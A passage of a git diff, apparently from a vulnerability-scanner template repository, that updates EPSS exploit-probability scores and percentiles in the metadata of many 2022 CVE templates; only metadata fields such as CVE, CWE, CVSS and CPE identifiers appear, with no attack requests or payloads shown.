epss-score: 0.12563 - epss-percentile: 0.94893 + epss-score: 0.1468 + epss-percentile: 0.95244 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index 9ed7751ad8..b6638570de 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23348 cwe-id: CWE-916 epss-score: 0.00425 - epss-percentile: 0.71473 + epss-percentile: 0.71633 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index e1160aaf44..934fc73675 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23544 cwe-id: CWE-918,CWE-79 - epss-score: 0.00065 - epss-percentile: 0.26908 + epss-score: 0.00083 + epss-percentile: 0.34435 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index f03cadc7ce..31e6471b05 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2373 cwe-id: CWE-862 - epss-score: 0.00399 - epss-percentile: 0.70649 + epss-score: 0.00328 + epss-percentile: 0.67866 cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 8f8f316ebf..0bb16e5fe2 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 - epss-score: 0.04933 - epss-percentile: 0.91949 + epss-score: 0.04117 + epss-percentile: 0.91273 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 2ce845faa3..cd0831a550 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23779 cwe-id: CWE-200 - epss-score: 0.01227 - epss-percentile: 0.83759 + epss-score: 0.01697 + epss-percentile: 0.86382 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index 7c053c18be..d08dd35ca2 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2379 cwe-id: CWE-862 epss-score: 0.01934 - epss-percentile: 0.87324 + epss-percentile: 0.87376 cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 4f45e7f754..c33975a6a0 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23808 cwe-id: CWE-79 - epss-score: 0.00744 - epss-percentile: 0.78757 + epss-score: 0.00743 + epss-percentile: 0.78844 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index eb4bd558d6..81b0caae33 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2383 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45778 + epss-percentile: 0.45893 cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 0083bd491e..6b8b6c6fef 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-23854 cwe-id: CWE-22,CWE-23 - epss-score: 0.86748 - epss-percentile: 0.98305 + epss-score: 0.82863 + epss-percentile: 0.98149 cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index 251369c767..e80a3e7e85 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23881 cwe-id: CWE-77 epss-score: 0.19726 - epss-percentile: 0.95813 + epss-percentile: 0.95864 cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 467b88aab0..5c7f42b6c9 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-23898 cwe-id: CWE-89 epss-score: 0.02031 - epss-percentile: 0.87685 + epss-percentile: 0.87716 cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml index c46ba719fc..b1f0663811 100644 --- a/http/cves/2022/CVE-2022-23944.yaml +++ b/http/cves/2022/CVE-2022-23944.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-23944 cwe-id: CWE-306,CWE-862 - epss-score: 0.45617 - epss-percentile: 0.97065 + epss-score: 0.45887 + epss-percentile: 0.97086 cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 9f0ccd17f3..b6d7d661ea 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 - epss-score: 0.97199 - epss-percentile: 0.99778 + epss-score: 0.97277 + epss-percentile: 0.99833 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index fc459fd340..18fcd1718e 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24124 cwe-id: CWE-89 - epss-score: 0.01649 - epss-percentile: 0.86168 + epss-score: 0.07543 + epss-percentile: 0.93481 cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index d3b8306b47..449191eae9 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-24129 cwe-id: CWE-918 epss-score: 0.00647 - epss-percentile: 0.76983 + epss-percentile: 0.77074 cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 58d0db538e..ff9e95c742 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2414 cwe-id: CWE-611 - epss-score: 0.01257 - epss-percentile: 0.84 + epss-score: 0.01256 + epss-percentile: 0.84092 cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index fabb605236..eba3e95ff4 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-24181 cwe-id: CWE-79 - epss-score: 0.00145 - epss-percentile: 0.50134 + epss-score: 0.0017 + epss-percentile: 0.54006 cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index f99ac388f7..6edd70d4cc 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24223 cwe-id: CWE-89 - epss-score: 0.11255 - epss-percentile: 0.94631 + epss-score: 0.3353 + epss-percentile: 0.96655 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 0add656668..c56ef72f40 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24260 cwe-id: CWE-89 epss-score: 0.35139 - epss-percentile: 0.96711 + epss-percentile: 0.96737 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index c7fbce3f84..00008c31cf 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24264 cwe-id: CWE-89 - epss-score: 0.05971 - epss-percentile: 0.92678 + epss-score: 0.04769 + epss-percentile: 0.91879 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 41237dea11..c67e75f198 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24265 cwe-id: CWE-89 - epss-score: 0.05971 - epss-percentile: 0.92678 + epss-score: 0.04769 + epss-percentile: 0.91879 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 380db2cfc9..849729ee75 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24266 cwe-id: CWE-89 - epss-score: 0.04048 - epss-percentile: 0.91144 + epss-score: 0.03216 + epss-percentile: 0.90213 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 19c511eb66..d36f2ed8c5 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-24288 cwe-id: CWE-78 - epss-score: 0.9227 - epss-percentile: 0.98727 + epss-score: 0.88581 + epss-percentile: 0.98442 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index ad1d606ec7..4b970b5fdc 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24384 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34974 + epss-percentile: 0.34922 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 34465788c2..577d177ce8 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2462 cwe-id: CWE-200 - epss-score: 0.01205 - epss-percentile: 0.83593 + epss-score: 0.01405 + epss-percentile: 0.85028 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 5e6307cd61..27bd4e0a10 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2467 cwe-id: CWE-89 - epss-score: 0.01454 - epss-percentile: 0.85194 + epss-score: 0.01309 + epss-percentile: 0.8445 cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 1a5d651ba5..06ff102837 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-24681 cwe-id: CWE-79 epss-score: 0.00155 - epss-percentile: 0.51711 + epss-percentile: 0.51753 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index b9ff0488a2..c65f882054 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24716 cwe-id: CWE-22 - epss-score: 0.22705 - epss-percentile: 0.96037 + epss-score: 0.22761 + epss-percentile: 0.96081 cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index 4d16708893..55dbfb1f16 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-24816 cwe-id: CWE-94 epss-score: 0.86507 - epss-percentile: 0.98291 + epss-percentile: 0.98326 cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index c8568f3c72..88882bddfd 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24856 cwe-id: CWE-918 - epss-score: 0.04137 - epss-percentile: 0.91228 + epss-score: 0.07548 + epss-percentile: 0.93484 cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 019a58f516..feea767d1e 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2486 cwe-id: CWE-78 - epss-score: 0.97361 - epss-percentile: 0.99882 + epss-score: 0.97301 + epss-percentile: 0.99853 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index de62825c0e..c6ec9c1dad 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2487 cwe-id: CWE-78 - epss-score: 0.97419 - epss-percentile: 0.99918 + epss-score: 0.97404 + epss-percentile: 0.99916 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 082fad3b3e..581a1cc9e4 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2488 cwe-id: CWE-78 - epss-score: 0.97408 - epss-percentile: 0.99912 + epss-score: 0.97392 + epss-percentile: 0.99908 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index ca22b65029..e53444d88d 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-24899 cwe-id: CWE-79 epss-score: 0.00342 - epss-percentile: 0.68323 + epss-percentile: 0.68481 cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index e7d0fbe398..b13a2c87fb 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.6 cve-id: CVE-2022-24900 cwe-id: CWE-668,CWE-22 - epss-score: 0.01206 - epss-percentile: 0.83608 + epss-score: 0.00999 + epss-percentile: 0.81936 cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index 1613fc6c65..d2f23395d6 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24990 cwe-id: CWE-306 - epss-score: 0.93762 - epss-percentile: 0.98912 + epss-score: 0.91953 + epss-percentile: 0.98719 cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 8cfdee501a..a6981ac996 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-78 epss-score: 0.0417 - epss-percentile: 0.91261 + epss-percentile: 0.91327 cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 4233bbb41f..d63a88eb6b 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-25125 cwe-id: CWE-89 epss-score: 0.02031 - epss-percentile: 0.87685 + epss-percentile: 0.87716 cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 184507d76d..ec86eea8eb 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25148 cwe-id: CWE-89 epss-score: 0.10089 - epss-percentile: 0.94336 + epss-percentile: 0.94364 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index 66d110d2b1..7aac62c207 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-25149 cwe-id: CWE-89 epss-score: 0.34697 - epss-percentile: 0.96695 + epss-percentile: 0.96721 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index d534e45df2..8b9f9789a6 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-25216 cwe-id: CWE-22 epss-score: 0.01312 - epss-percentile: 0.84381 + epss-percentile: 0.84466 cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index d43fce3395..e67fb78139 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25323 cwe-id: CWE-79 epss-score: 0.00115 - epss-percentile: 0.44915 + epss-percentile: 0.4502 cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 12f8bac022..8ed4ed8237 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2535 cwe-id: CWE-639 - epss-score: 0.00271 - epss-percentile: 0.64277 + epss-score: 0.00223 + epss-percentile: 0.60539 cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 6f25957027..dba2d3d17b 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-25356 cwe-id: CWE-91 epss-score: 0.00425 - epss-percentile: 0.71464 + epss-percentile: 0.71625 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index cfed6a38a2..3e15985423 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2544 cwe-id: CWE-425 epss-score: 0.00551 - epss-percentile: 0.7493 + epss-percentile: 0.75066 cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 5640b17e11..920ff9c134 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.7 cve-id: CVE-2022-2546 cwe-id: CWE-79 - epss-score: 0.00139 - epss-percentile: 0.49218 + epss-score: 0.00165 + epss-percentile: 0.53101 cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 7476985b26..103684d970 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25481 cwe-id: CWE-668 epss-score: 0.01311 - epss-percentile: 0.84375 + epss-percentile: 0.8446 cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index 8a369f2017..9feb716f2d 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25485 cwe-id: CWE-829 epss-score: 0.00648 - epss-percentile: 0.76993 + epss-percentile: 0.77084 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 8451d21f44..0741bc61e6 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25486 cwe-id: CWE-829 epss-score: 0.01775 - epss-percentile: 0.86626 + epss-percentile: 0.8667 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index ee9ae17a03..311f61db46 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25487 cwe-id: CWE-434 epss-score: 0.88802 - epss-percentile: 0.98421 + epss-percentile: 0.98459 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index 628ff62381..7d6debcdfd 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25488 cwe-id: CWE-89 - epss-score: 0.02852 - epss-percentile: 0.89608 + epss-score: 0.02031 + epss-percentile: 0.87716 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index fed20b0228..7752a1f170 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-25489 cwe-id: CWE-79 - epss-score: 0.00648 - epss-percentile: 0.76991 + epss-score: 0.00134 + epss-percentile: 0.48393 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 1a7e7db5b3..af751e9744 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-25497 cwe-id: CWE-552 - epss-score: 0.0069 - epss-percentile: 0.77844 + epss-score: 0.00508 + epss-percentile: 0.73991 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 777c89b5da..b9e1575642 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2551 cwe-id: CWE-425 epss-score: 0.79836 - epss-percentile: 0.97991 + epss-percentile: 0.98016 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index 95a414bb9a..dad5798031 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-25568 cwe-id: CWE-1188 epss-score: 0.01838 - epss-percentile: 0.86921 + epss-percentile: 0.86962 cpe: 